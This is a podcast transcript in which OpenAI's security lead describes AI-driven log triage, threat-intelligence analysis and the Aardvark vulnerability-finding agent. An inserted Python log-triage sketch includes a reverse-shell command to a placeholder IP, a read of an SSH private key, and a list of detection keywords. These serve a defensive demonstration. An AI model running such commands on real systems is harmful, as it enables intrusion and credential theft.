AI + a16z

The AI That Found A Bug In The World’s Most Audited Code

39 min
Dec 10, 2025
Summary

Matt Knight, OpenAI's VP of Security Products and Research, discusses the evolution of AI-powered security tools from GPT-3's limitations to current capabilities. He details Aardvark, an AI agent that discovers zero-day vulnerabilities in code and generates patches, including finding memory corruption bugs in highly audited software like OpenSSH.

Trends
AI security tools moving from efficiency gains to enabling previously impossible tasks
Shift from human-driven vulnerability research to AI-automated discovery
Democratization of advanced security capabilities for under-resourced organizations
Continuous automated security testing replacing point-in-time assessments
AI agents providing security expertise to open source maintainers
Language models enabling real-time threat intelligence analysis across languages
Full Transcript
The data set wasn't in English, it was in Russian. But it wasn't just in Russian, it was in, like, the Russian shorthand that these 20-year-olds are using to coordinate. It would have taken a diverse analytic team of linguists, technical experts, you name it. I mean, who knows how long it would have taken to pore through that data. And you know, we just suddenly had this alien intelligence that could just do it all day. We found a memory corruption bug in OpenSSH, which is one of the most highly audited pieces of software out there. Anytime you're finding memory corruption in OpenSSH, that's super interesting. Think about the blast radius had that made it into Linux distributions. That backdoors, what, like half the Internet. With language models and the tools that we can build on them, we actually have the ability to scale security intelligence to all the places that need it. Right. To give these developers a fighting chance.

OpenSSH is one of the most audited pieces of software on the planet. Security researchers have pored over it for decades. And OpenAI just built an AI that found a memory corruption bug in it. Matt Knight spent five years as OpenAI's CISO. Now he leads Aardvark, an AI agent that hunts for vulnerabilities the way a human security researcher would. It reads code, writes tests and proposes patches. And it's finding bugs that humans missed. This conversation traces the arc from GPT-3, which couldn't analyze a simple security log, to today's models that discover flaws in critical infrastructure. Matt and a16z's Joel de la Garza discuss why defenders might finally be gaining the upper hand and what that means for the open source maintainers currently outgunned by nation-state attackers.

Matt, thank you so much for coming back. Really do appreciate you coming on the show. You've done a couple of these with us talking about AI and security.
I talked to a few folks at OpenAI and several of them told me you had the most interesting job at OpenAI, which is saying quite a lot because I think everything that they've done so far has been pretty crazy. So I'd love to maybe just start off by hearing a little bit about you and kind of what you do and what your role is at OpenAI and go from there. Yeah, Joel, thanks. It's great to be back. Great to see you again. I think the last time I was here I was having a chat with Vijay and Jason and it's great to have the chance to reconnect. So I'm OpenAI's VP of Security Products and Research, where I'm focused on applying AI to some of the hardest unsolved security challenges of our time. And the goal of the program is to create defensive advantage using AI. Prior to this, I was OpenAI's CISO and head of security. I was in that role for five years before moving into this new focus. And you are correct, it's a lot of fun. I get to work on some really, like, incredibly important and interesting challenges with amazing people at a very important time. Awesome. And congratulations on getting rid of the CISO role. That's usually a reason to celebrate. I am so thankful and grateful for my five years in that role. Before moving into this new role, I would have said that I'd be proud if that were to have been my life's work. But I couldn't be more excited and engaged by some of the things that we're working on. I think we're going to have the opportunity to put a really big dent in some very important problems. Yeah, absolutely. And so I think we last chatted maybe two years ago and the discussion was really focused on two parts. The first is sort of securing AI and kind of how do we deploy that. And I think that's kind of a road we've gone down and we've made a lot of progress on.
I think the one that's really interesting, and the thing that you've been focusing on, is sort of how do we use AI to do security. And so we've seen over the last three years. Right. I think we're at the three-year anniversary of the ChatGPT moment. Can you believe that, by the way? Three years. I can't either. Yeah, I think it's one of those things where if you lay in bed all day, your days drag by, but if you're busy every minute of the day it flies. And so it's just really flown by. Sure is. What's even more incredible is just that, like, every two weeks there's some new breakthrough. My measurement of how exciting tech is is by how many late nights I spend playing with it. And before ChatGPT it was probably once every six months. And then after ChatGPT it's once every three weeks. Right. And just the pace of really cool stuff. And so the cool stuff that's happening now, to kind of what you're working on, is we're actually starting to see AI make a dent in security. And it seems like perhaps it's starting with the more provable use cases like code security and then probably going to trickle through. But I would love to maybe hear kind of your take on how that's working. Yeah, I appreciate that. Maybe to frame my conviction in how AI is going to transform defense, I think it might be good to walk backward and start from the beginning. So I joined OpenAI in mid-2020. It was June 2020, and just to orient us in the AI timeline, the frontier model of the era was GPT-3. I joined right as we were launching GPT-3 on the OpenAI API, which at the time was an alpha or beta research preview. It was very experimental, and I came in with all these grand aspirations of building an AI-native security program. We have this incredible alien technology that can do amazing things with text and language.
Boy, I can't wait to see how much I'm going to be able to automate with this incredible frontier model, GPT-3. Spoiler alert: nothing. The model just was not good enough for real security automation or operational tasks or things that would actually create impact for a security program. There were a number of reasons why. It was very limited in context length compared to models that we have today. The token vocabulary wasn't well oriented for a lot of what we wanted to process. And then it was just a model with limited world knowledge and horsepower, and it wasn't able to really do that much for us. If you gave it multiple-choice questions or trivia, it could occasionally fake its way through. But if you gave it a series of log lines and asked it to review them and classify them, or a section of code and asked it to spot the bug, it couldn't do it. Or it would make something up. Yeah, or it would make something up. Good news for us, though, is that a lot has changed since 2020. We're here in 2025. The frontier model is GPT-5. We've had many breakthroughs along the way. Whether it's the improvements to RLHF and instruction following that make the models more steerable, or things more recently like the reasoning paradigm, which we've seen contribute to a number of breakthroughs for us too, it means that we have models that are really incredible. And there have been a few points along the way, for me and the team, that really forced us to update. The biggest ones came during GPT-4 training. So again, to bring us back to the AI timeline, that was summer 2022, and GPT-4 was a really incredible moment at OpenAI because it was a true all-hands-on-deck push. We were embarking on training a model that had to one-up GPT-3 and 3.5, which were quite good and quite profound. And we had the hypothesis that the scaling laws were going to hold and that we'd be able to add more data, more compute, and make an even better model. So we had a lot to live up to.
So everybody across the company, from research to our infrastructure teams, the security teams, everybody was all hands on deck working on this big effort to train this model. And it's not just one and done. Training a model takes time. So as the model is baking in the oven, we get these more and more formed snapshots of it that we can start to test and sample, to see what the final product is going to look like. So we on the security team got our hands on a snapshot of GPT-4 when it was about halfway there. So it wasn't as good as it was going to be, but it was enough to start to get a feel for what this model was going to look like when it popped out of the oven. And we put it through some tests. And this is mostly us, as you were saying, late at night, playing with it. Yeah, just playing with it and making first contact with it. And there were two tests that we ran that really kind of wowed us in the moment. The first was we took some of our security logs and we ran them through the model, prompted: pretend you're an expert security analyst reviewing these logs; summarize the behavior and determine if what you see merits escalating to a human for further review. Typical tier-one, level-one triage. Exactly. That sort of workflow. Yeah, it's the sort of thing that every security team does. Right. Probably thousands of times a day, you would hope. But then there's the question of how many logs can you look at? Like, how good are your people at it? And the log source that we looked at was interactive SSH logs. So imagine, like, your bash history, or command-line-level logging that you would get from an employee either running commands in their terminal on their laptop or SSHing into a server. An SRE doing prod stuff or something. Exactly.
You know, you could argue that having a human review that data wouldn't just be ineffective, it would be, like, cruel and unusual, or potentially a war crime. Yeah, yeah. You know, just review all this benign stuff and find the needle in the haystack. And oh, by the way, your job and the security of the company depend on it. Right? Like, honestly. Right. And not to distract a bit, but that's always been a challenge with security teams, which is that you hire these incredibly expensive, really talented, super skilled people, like a malware reverse engineer from the NSA that's done it for 10 years, and then you have them go look at SSH logs. But it's in the details, and that's what matters. Totally. Yeah, yeah. But so back to this anecdote, right? So we get these log sources, these really kind of pedantic, rote sources, run them through this prompt, and the model just kind of got it right. You give it an example that had just a benign example of somebody configuring a web server or doing normal tasks and it says, hey, this is fine, no escalation needed. And since we're here, here are some tips to maybe make it more secure. Interesting value-add there. But then you take those same payloads and you start to turn up the heat a bit. You maybe touch secrets that are there. You, sort of in the limit, open a reverse shell or something like that. And the model said, right there, you should have somebody look at that. And this was, again, just to bring us back to the framing, an early version of GPT-4. I just have to, like, I'd love to understand, and I think I know the answer, but maybe from you, the root cause of how it's spotting things like reverse shells being bad. Is that because there's so many incident descriptions that are in the training data set, and it's kind of trained on that behavior? Or I guess, what do you think?
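The triage workflow described above, batching interactive SSH logs into a prompt and asking a model whether the activity merits escalation, can be sketched roughly as follows. This is illustrative only: `call_model` is a stand-in for a real chat-completion API call, replaced here with a toy keyword check so the shape of the pipeline is runnable end to end.

```python
# Hypothetical sketch of tier-1 log triage with a language model.
# The prompt structure mirrors the one described in the conversation;
# `call_model` is a placeholder, not OpenAI's API.

TRIAGE_PROMPT = """You are an expert security analyst reviewing interactive
SSH session logs. Summarize the observed behavior, then answer ESCALATE
or NO_ESCALATION depending on whether a human should review it further.

Logs:
{logs}
"""

def build_triage_prompt(log_lines: list[str]) -> str:
    """Render the triage prompt for one batch of command-line logs."""
    return TRIAGE_PROMPT.format(logs="\n".join(log_lines))

def call_model(prompt: str) -> str:
    # Placeholder for a real model call. This toy version flags a couple
    # of classic red-flag patterns (reverse shells, reads of secret
    # material) so the pipeline can be demonstrated deterministically.
    suspicious = ("nc -e", "bash -i >&", "/etc/shadow", "id_rsa")
    return "ESCALATE" if any(s in prompt for s in suspicious) else "NO_ESCALATION"

benign = ["sudo systemctl restart nginx", "vim /etc/nginx/nginx.conf"]
hostile = ["cat ~/.ssh/id_rsa", "bash -i >& /dev/tcp/203.0.113.9/4444 0>&1"]

print(call_model(build_triage_prompt(benign)))   # NO_ESCALATION
print(call_model(build_triage_prompt(hostile)))  # ESCALATE
```

In a real deployment the verdict would come from the model itself, and the interesting engineering is in batching, deduplication, and routing the ESCALATE cases to a human queue.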
What do you infer is kind of driving that analysis? You know, if we had one of our researchers here, I think they'd be able to think very deeply about this and give you a more scientific reason. Part of it is the world knowledge, part of it is the training, at least in that era. And with things like the reasoning paradigm, we've really been able to push it even further in terms of what models can do and deduce about this behavior. More on that later. So that was the first example that really blew us away. This was just impossible with GPT-3 or 3.5. It was a totally new capability for us. The second one I want to briefly talk about from that era, too: we had this threat intelligence data set that we'd gotten our hands on. There was this cybercriminal group that had imploded earlier that year, and as part of it, their internal chat logs wound up online. So when this group kind of dissolved, this interesting data set of sixty-something thousand messages back and forth of these cybercriminals plotting and doing crimes and stuff winds up online. Yeah, and they always have great opsec, so there's totally nothing identifying in those chat logs. Right. Well, so we got this data set, right? And I think we used LangChain to be able to do the context stuffing and manage all that. But we ran that through, again, GPT-4 and started asking questions of it. Who are these guys? What targets are they going after? If we want to defend against these groups, what types of indicators or tradecraft should we look out for? And it led us right to it. It told us that they were going after primarily civilian soft targets and things like that. They were going after some transportation companies. We saw some interesting results from that. They had either 0-day or some sort of access through a security appliance that they were using to get in.
And we were also seeing, based on their back and forth, that these actors were largely being successful, or rather that the companies that were being targeted were largely successful at finding them and kicking them out. You can see this because we can see them kind of getting in and then, oh no, we lost access, actors getting mad. What makes this interesting? A couple of reasons, I think. But what really seals the deal is the data set wasn't in English, it was in Russian. Oh yeah. But it wasn't just in Russian. It was in, like, the Russian shorthand that these 20-year-olds are using to coordinate. And it would have taken a diverse analytic team of linguists, technical experts, you name it. I mean, who knows how long it would have taken to pore through that data. And we just suddenly had this alien intelligence that could just do it all day, which was great. So I mean, that really changed the game for us. We really started to look for opportunities to bring language models into the program. The things that we had the most success with were frankly pretty operational, automating parts of the apparatus that it takes to run a security team. These are things that aren't even that technical, but you need enough technical horsepower to succeed with them. So we kind of started in the operational space. Yeah. And largely it was still very much human in the loop. Oh, entirely. It was augmenting existing staff, basically. Entirely. And I think one of the things that has evolved for me, in my understanding, has been: when we had GPT-4, we had a tool to largely help us with efficiencies. Right. There were things that could help our teams be more effective, help them cover more ground, help remove some of the toil in their work.
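The "context stuffing" step mentioned above has a simple shape: a corpus of tens of thousands of chat messages will not fit in one context window, so it gets split into batches that do, each batch is paired with the analyst's question, and the per-batch answers are aggregated. A minimal sketch, with `ask_model` as a placeholder for the actual model call:

```python
# Illustrative chunk-and-query loop for a large chat-log corpus.
# The chunking logic is real; `ask_model` is a stub for an LLM call.

def chunk_messages(messages: list[str], max_chars: int = 8000) -> list[list[str]]:
    """Greedily pack messages into batches under a character budget
    (a crude proxy for a token limit)."""
    batches, current, size = [], [], 0
    for msg in messages:
        if current and size + len(msg) > max_chars:
            batches.append(current)
            current, size = [], 0
        current.append(msg)
        size += len(msg)
    if current:
        batches.append(current)
    return batches

def ask_model(question: str, batch: list[str]) -> str:
    # Placeholder: a real implementation would send the question plus
    # this batch of (possibly non-English) messages to a model and
    # return its answer for later aggregation.
    return f"[partial answer over {len(batch)} messages]"

messages = [f"msg {i}: " + "x" * 100 for i in range(500)]
batches = chunk_messages(messages)
answers = [ask_model("What targets are they going after?", b) for b in batches]
print(len(batches), "batches,", len(answers), "partial answers to aggregate")
```

Modern long-context models and retrieval pipelines make this cruder batching less necessary, but the pattern is still the backbone of analyzing corpora larger than any single context window.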
One example that is, I think, frankly trivial, but it's also why I love it: we built this bot, like a Slack bot, that you could use to gather information from employees if you're investigating something. Oh yeah. Rather than, as you said, your highly skilled security engineer having to go, hello, colleague, my name is so-and-so, and talk to a marketing person, and then do that across their whole caseload. Right. Being able to just have a bot go and get that information and bring it back, and then have them review it and make whatever decision is needed, that helps that engineer be more effective. It also removes a lot of toil from their work of having to do all this juggling. So I started out thinking about this as really an efficiency opportunity. But what we've seen with modern models, with breakthroughs like the reasoning paradigm, is that they're now enabling us to do things that were just previously impossible. And that largely informs what we're working on with Aardvark and some of the work within our program. Yeah. So maybe let's talk about that. Right. Because I think the current state of the art. I haven't yet played with Aardvark, so I couldn't tell you. If you can hook us up, we'd love to take a look. I might know a guy. There you go. Yeah, let's get that set up after this. It seems the order in which AI is solving problems maps pretty clearly to things that can be machine-verifiable. And so it feels like a lot of the security problems that folks have been trying to throw AI at are just not machine-verifiable. But code security is. So maybe, well, first of all, what is Aardvark? Probably getting the cart in front of the aardvark. So maybe: what is Aardvark?
And kind of what's the approach? Starting off there. Yeah. So Aardvark is our agentic security researcher. It looks at code, it finds zero-days in that code, and then it patches those zero-days. It generates the patches to fix them. And this is all using... it's not running external tools, like a static analyzer or a fuzzer, right? You're doing this with the models that you've built internally. Aardvark takes a very language-model-forward approach to doing this. Maybe the best way to analogize it is that it looks for bugs the same way that you or I might, or an expert vulnerability researcher would. It does so by reading the code, by analyzing the code. It'll write and run tests. It'll actually try to stand up scaffolding and explore it. It really experiments, explores and attacks the problem the same way that a human might. And if you look at some of the conventional methods for doing vulnerability discovery, to your comment on things being machine-verifiable, they were largely human-driven tasks. You have vulnerability researchers who will pore over source code, who will reverse engineer binaries. They'll run fuzzers that will generate thousands or tens of thousands or hundreds of thousands of crashes that they then need to review and map back to the conditions that caused them. What we're seeing with Aardvark is that the language model is able to explore in the same way that a human might. And then you combine that with the ability to generate and execute code and to test these hypotheses, and you wind up with, I believe, a very compelling capability. So the Aardvark workflow is actually very simple. You hook Aardvark up to a code base, and the first thing it will do is generate a threat model, just as any good security engineer would. Right.
It'll take a broad look at the code base, and it will determine its assessment of the security objectives and the design and architecture of the code base. Essentially a planning phase, basically. Yeah, that's right. So it looks at that and it builds its own model for what this code base is and what the security properties of it are. It then will look for vulnerabilities within the code base, using that exploratory, very agentic way of looking for them. Once it finds a vulnerability, it will actually go a step further and attempt to verify it. We call it validation within the product: within a secure sandbox, it will run the code and attempt to trigger the condition, to verify that the vulnerability is in fact a true, correct vulnerability. And then at the output of that step, we obviously lean on our partners. We're doing this at OpenAI, right? So we have access to great tools like Codex, and we use Codex to generate a patch. And then we rescan the patch with Aardvark. Oh, nice. So the happy path here is that by the time a human lays eyes on the finding, you have the finding and then you have the patch. It's all right there. You just read it and you click a button, and you've got a patch. We started Aardvark initially as a research program within OpenAI. I got linked up with Dave Aitel, a legend and pioneer of a lot of application security. Dave's amazing. I got linked up with Dave about a year ago or so, and Dave was largely working on independent research applications of LLMs to security. And he came in and we started this really just as a research project of, let's see what we can do here. And the results started coming. So we started scanning OpenAI's own code. In addition to helping to solve some security problems, we got feedback from our development teams that was quite interesting.
We found that devs wanted more from it, not less, which, as a CISO trying to protect things, is not something you can take for granted. And are you sliding all the way left into the dev's terminal? No, we're not today. So Aardvark is still living in CI/CD, kind of. It's really for security engineers today. That's kind of where we're starting, in part because that's where we think we're going to get the best feedback as we look to hone the capability. Devs don't want to fix security problems, they want to ship cool stuff. Right? But what was really interesting about the feedback we got was that developers found that it was explaining these bugs in ways that helped them understand. That makes a ton of sense, though, right? The average security engineer is not typically at the coding level of a senior software developer. Right. But even if they are, right, I mean, you think about it: you drop a ticket on somebody that says this is vulnerable to CVE-2020-whatever, and you read the advisory and you're like, what do I have to do about this? Aardvark, because it is contextual and the model can understand the context and generate tailored responses, can actually give feedback to the developer that explains in context not only what the issue is, but how to fix it. Yeah, totally. So they really liked that. They started asking for more findings from it. They wanted us to bring their new hires in on it. They really incorporated it as part of their workflow, which to us was a really powerful proof point that we were on the right track. So from there we moved on to scanning some open source projects that we thought were really important. I'm curious, kind of, what languages are you seeing this be the most effective with? You know, honestly, it's a mix.
So we were expecting it to be good at systems code. Right. That's where we started. We do a lot of work in sort of modern languages at OpenAI, but we also have a lot of memory-unsafe code too. I think one of the things that was surprising to us was that Aardvark was performing across a broad spectrum of stacks. Yeah. So when we moved to open source, we found some memory corruption bugs in some very interesting, very highly audited targets. Think anything written in C that probably runs at the infrastructure level. That's right. That's the first place I looked. We found a memory corruption bug in OpenSSH, which is one of the most highly audited pieces of software out there. Anytime you're finding memory corruption in OpenSSH, that's super interesting. Yeah. And we reported that one, a CVE got issued, it got patched, all that. The OpenSSH team's amazing. But so we started broadening the aperture and looking at these open source projects, and found that the capability was generalizing pretty well and that we were having success there too. And that's really what gave us the push to see what else we could do with this tool, to start to expand access and put it out there. I believe that there are a few things that are novel with it. The first is that it finds zero-days. Right. You think about the sourcing of those types of issues. Conventionally it's from humans, as we said: it's a human vulnerability researcher finding a bug, it's a fuzzer generating crashes and humans sifting through them, things like that. Aardvark can actually find those novel issues. And the second is the connection with patching. The fact that we can use codegen. The G in GPT stands for generative.
We can lean into that to generate the fixes, and in doing so I think we can just transform the way that software is built and secured. The thesis we had, I think two years ago here. Because there have been a lot of waves of security AI, of using AI to solve security problems. We're probably in wave three or four right now just since ChatGPT. And the thesis we had at the very start of this was that things start to work when you start to see novel zero-days found in highly audited source code bases. Right. And so the first wave of this stuff was, oh look, there's a bunch of cross-site scripting errors that we found in these open source JavaScript-based applications. And now we're getting to the point where we're finding memory corruption issues in core infrastructure code that's probably written in C and has particularly sharp edges like that. It just seems like it's starting to signal that this stuff is actually working. Right. I think we've gone beyond the stage where we've overfit these things and they're just looking for patterns found in previous CVEs, and now we're finding things that are novel. Is that kind of what you're saying? I think that's a good assessment. That's right. That's fascinating. And I think it just makes total sense, right? As OpenAI and the other frontier labs lean into codegen, as codegen becomes a primary product that these folks are selling, this is a feature, right? The code that you generate needs to be secure. And so it makes total sense. One of the other areas, and this goes back to kind of the first use case you talked about, where we've seen a lot of excitement, a lot of energy, is around the idea that these AI agents will start replacing people. And this is, I guess, a continuation of maybe the MDR space or the AI SOC space.
And I'm just curious, what has your experience been on that side of the equation? Like, clearly, as we talked about, these things are very additive to tier-one, level-one analysts. Are we getting or approaching the point where they actually start replacing that labor, or are we still very much in the augmenting phase? Oh, I think there is no line of sight to any impacts there. Like, the cybersecurity talent shortage is frankly almost a meme at this point. I mean, we need tools to augment the people that we have because we just don't have enough people. Right. It's an exquisite skill that's required to be a security engineer. You have to be technical, you have to be operational. And it's a specialization within the specialization. We need as many people entering the cybersecurity workforce as possible, and we need to equip them with the best tools for them to be the most effective. So I feel totally bullish on that. Yeah. That said, as we were saying at the top, there's a lot of drudgery that goes into doing security work. It's the details, it's the late nights, it's coordination, it's business process. It's not all malware research and figuring out this JSON blob, right, threat intel and things like that. It's a lot of business process too. Right. And maybe that gets some people out of bed in the morning, but it's just part of the job. And these are tools that are going to help teams be more effective, more efficient, solve problems that frankly need to be solved, and hopefully in ways that are more ergonomic and sustainable. Yeah, yeah. I mean, the most recent number I saw was 3.5 million unfilled security jobs in the US, I think was the number. I mean, I'm sure it's padded, I'm sure it's inflated, but it seems completely insane.
Having tried to hire people in this role, in this field, it's always such a challenge that it just always feels like there is a massive shortage. But it seems like maybe 2026 is the year we start to get over the hump. Right. Maybe these tools get us to a point where we don't necessarily need fewer bodies, but we can do more with the bodies that we've got. I think there's also something to be said for the on-ramp it can provide, too. These tools are incredibly useful for learning new concepts and exploring. My pathway into security was through research. I was doing research on wireless systems, and these were kind of hard, brainy topics. There was not a lot of public-domain information about it, and I just think about how much that work would have been transformed with a tool like ChatGPT. I think there's a lot that can be said for that too. Yeah, 100%. It's funny, the order of this discussion has been sort of like we started with the least sexy things first, right? Sort of like SecOps, then code. The thing that people always talk about, the thing that always gets the most clicks and the most attention, is always the hacking. It's always the offensive stuff. It's offensive cyber, penetration testing, all these sorts of things. We've seen with some of the other labs, and you guys have published as well, nation-states using these tools, all kind of the usual stuff you would expect to see, right? If you've built a great product, of course nation-states are going to use it. Also, I'd like to point out that it just seems like a really huge win for the American frontier labs that foreign adversaries are using our tech as opposed to their own domestic models. So congratulations, we're still in the lead. One way to look at it, I guess. Hey, look at that.
They're not running DeepSeek models. So, awesome. I guess the question would be: it seems the nature of the attacker is that you have infinitely many shots on goal and you only need to be successful once. And so it makes sense that if I have this mechanical turk that can run infinitely, provided I have infinite money, I can get this thing to find a bug. Right. And so it seems there's an alignment there. But I'm curious, from your perspective, we've seen a lot of automated pen-testing companies, we've seen a lot of more offensive cyber research people, threat modeling, et cetera. Do these models seem better situated for doing the offensive work, or are they more situated for the blue-team work? I'm just kind of curious about your take on how this space is developing. So, you say that the attackers get to run all these mechanical turk shots on goal. So do we. Yeah. Well, now you do. Yes. That's what I think is really exciting here. Well, I guess the difference is that you have to be 100% right on the blue team. Attackers can fail 99% of the time, but they get the 1%. I think that's debatable. I'm sure you get some access, but then, you know, you get booted out. Sure, yeah. I mean, cat and mouse, right. Really, the history of human conflict is defined by this sort of evolving imbalance. And I think we don't have to bring AI into the equation to look at some of the security shortfalls that exist in the ecosystem. Right. Like, the state of modern software security is quite uneven. Some might even say bad. Yeah. And the scale and complexity of it has reached such a state that we need tools like this, frankly. We need the ability to scale security expertise to all of the developers and organizations that need it.
One of the reasons why I'm personally really motivated to work on Aardvark is to do something and give something back to the open source community, and we should come back to that, but just to speak to the threats real quick. So, OpenAI publishes threat reports. We try to share what we're seeing so that other labs and stakeholders can learn from it. And I think you guys were the first lab to start putting stuff out there. We were. And just to speak to that: we published our first threat report as a joint effort with MSTIC, Microsoft's threat intelligence team, back in, I think it was early 2023. We worked together and we were able to identify threat actors from China, Russia, Iran, and North Korea, learn what they were doing, and then kick them off and get rid of them. And we found that they were experimenting but largely weren't being that successful. Since then we've put out more threat reports, and we've also built a team and a whole apparatus to do this at scale and be really good at it. What we're seeing is that these adversaries are interested and they're motivated. My editorial, though, is that you look at what defenders are doing today, and the balance of trade, where the value is accruing, is far in their favor. I think if you were to poll most CISOs, they would agree with that. Yeah, I mean, I think it's just the hiring. If you want to hire a red teamer or a pen tester, you get hundreds of applications. But if you want to hire a really good blue team engineer, you'll find like three. Right. I think there's just an attractiveness to the offensive side that makes the equation look more unbalanced than it is.
To your point, I think that's why the value of these tools will more readily accrue to the blue team, because the blue team is consistently the one with the biggest labor shortage. Could be. I mean, you have to play offense to play good defense. Right. But red team always wins, right? That's always the easy side of the equation. The defense is the hard one. Yeah. But then you do it again. It's a program and a journey. Right. Yeah. Do you think we get to a point, and I know this is a bit of a loaded question, where we just have kind of continuous testing? Because all the things we do in security are always points in time, right? Okay, this was last week. Okay, this was this week. Does this actually get us to a point where we can do this all the time? Well, that's what Aardvark is. Aardvark is continuous and proactive. It's always on. It's auditing changes to your code in basically near real time. One way of framing it is that it's a senior AppSec engineer who's always there, just checking your work, and it's going to tap you on the shoulder if there's a problem. That's just one surface. We're just looking at code. Yeah. But you can think about how this could generalize to other parts of the enterprise and other places where it's needed. I want to go back to the open source topic, because this is one that I'm very impassioned about, in believing that software is so complex and the open source community gives us so much. They are also under-resourced and overworked. OpenAI has the privilege of being able to hire and staff a security team, but even some of the best resourced projects struggle to build security programs. And then you go further down.
Frankly, the story of the year for me last year was the xz Utils backdoor. Oh, yeah. It was incredible. And none of the tooling in the toolchain caught it. It was some overly obsessive, principal-level engineer who was frustrated about latency and keystrokes. Right. We got lucky as hell. If you're listening: thank you. Yeah, totally. I'll buy you a beer. So, just for the benefit of the listeners, to set the stage on this: xz Utils is an open source library that implements the xz compression algorithm, and it was maintained by a solo developer. This library was used in a number of places, notably, I think, by systemd, which is a component of Debian and other major Linux distributions. This developer, I think, got socially engineered. They basically took on a co-maintainer who turned out not to be who they said they were, and who didn't have the intentions they claimed. That person added a stealthy, discreet backdoor right before a major release, which made it into pre-release versions of major distributions, which is ultimately where it got caught. And just think about the blast radius had that made it into stable Linux distributions. That backdoors, what, like half the Internet? Oh yeah, totally, probably. And that's the one that we found. Yeah, right. There's been a lot of speculation as to who was behind the attack. But what chance do these open source developers, these heroic volunteers who spend their time contributing their knowledge, giving back, and delivering the building blocks that enable the industry to do so many amazing things, what chance do they have against the full force of a foreign intelligence service, or a really determined criminal group that seeks to subvert them? And those package maintainers probably have 15 to 20 other packages they're maintaining. It's just ridiculous.
Yeah, we talk about this all the time. You look at the npm issues we've been having; it's creating a real problem. But with language models and the tools that we can build on them, we actually have the ability to scale security intelligence to all the places that need it. Right. To give these developers a fighting chance, the tools they need to really be empowered on security here. And with Aardvark, we're hoping to do something really big around open source. We haven't exactly figured out what, but we're in private beta now, and this is an open call to open source maintainers: if you want to be on the beta, please reach out. We'd love to hear from you, and we'd love to make Aardvark a tool that works very well for you. There you have it. Aardvark for open source maintainers. I think we'll get a big inbound from this one. Yeah, it's a topic I'm very impassioned about. My journey into security, I mentioned, was doing wireless research. I started doing security research largely using open source hardware and software, tools like the GNU Radio project and different open source SDRs and things like that. I frankly have to thank that whole community for my career, because who knows if I would have gotten into security without it. There are just such amazing, talented, and passionate people who volunteer their time all day, every day. And I hope that with Aardvark, the team and I are able to put our finger on the scale and deliver something that really helps these developers. Absolutely. I mean, I think the dream is, right, security has always been kind of a rich person's game. It's the global banks, the big defense contractors that have unlimited budget, hire all the people, and buy all the cool toys. And it just seems like this is a wave where we're going to start to democratize some of this stuff.
It'd be great if my local mom-and-pop dentist had the same security profile as my investment bank. Right. It just seems like that's a much better world, where everyone can get access to this kind of stuff. I hope you're right. And you look at critical infrastructure writ large, and there's a lot that we can do here. Yeah. It's funny, because I think this is very much a mid-2010s kind of attitude, which was: we've got to stop using security as a competitive advantage. A world in which we win because we don't get hacked is not a good world to live in, especially when you start talking about things like nuclear power plants and airplanes. Just throwing back to the podcast we did with BJ and Jason a couple years ago, those guys are great. And no matter what gets reported in terms of competition in the ecosystem, we're all facing the same threats and challenges, and we're very aligned and united in that, which I thought was a really great and appreciated relationship. Absolutely. Well, thank you so much. This has been a wonderful conversation. Great to hear about all the progress, and congratulations on having the coolest job at OpenAI. That's quite a title. Thanks, Joel. A lot of fun. Great conversation. Thanks for having me. Thank you. Thanks for listening. If you enjoyed the episode, let us know by leaving a review at ratethispodcast.com/a16z. We've got more great conversations. See you next time. As a reminder, the content here is for informational purposes only, should not be taken as legal, business, tax, or investment advice or be used to evaluate any investment or security, and is not directed at any investors or potential investors in any a16z fund.
Please note that a16z and its affiliates may also maintain investments in the companies discussed in this podcast. For more details, including a link to our investments, please see a16z.com/disclosures.